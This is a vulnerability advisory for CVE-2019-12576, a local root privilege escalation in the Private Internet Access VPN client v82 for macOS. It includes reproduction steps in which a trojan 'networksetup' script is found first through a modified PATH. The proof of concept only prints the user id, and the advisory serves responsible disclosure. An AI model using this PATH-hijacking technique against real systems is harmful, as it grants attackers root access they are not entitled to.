Title: PIA macOS Privilege Escalation: Untrusted Search Path
Author: Rich Mirch
CVE: CVE-2019-12576
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for macOS could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA macOS openvpn_launcher binary is setuid root. This program is called
during the connection process and executes several operating system utilities
to configure the system. The networksetup utility is called using relative paths.
A local unprivileged user can execute arbitrary commands as root by creating a
networksetup trojan which will be executed during the connection process. This
is possible because the PATH environment is not reset prior to executing the
OS utility.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - Create a script named networksetup with the following two lines. This
PoC sends the output of the id command to wall, which will show that it is
running with root privileges (uid=0).
#!/bin/sh
echo "$0: $(/usr/bin/id)"|/usr/bin/wall
Step 2 - Make the networksetup script executable.
chmod 755 networksetup
Step 3 - Execute run.sh to open the PIA GUI client while prepending the current
working directory ($PWD) to the PATH environment variable. This ensures that the
trojan networksetup script is found first, because relative paths are used.
env "PATH=$PWD:$PATH" /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh
Step 4 - Log in and connect to the VPN.
During the connection process networksetup will be executed as root, and a
wall message will be broadcast showing the output of the id command with uid=0.
Timeline
2018-12-18: Reported to vendor
2018-12-19: Vendor acknowledged receipt of report
2019-01-18: Vendor states a fix will be available in v83; however, this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure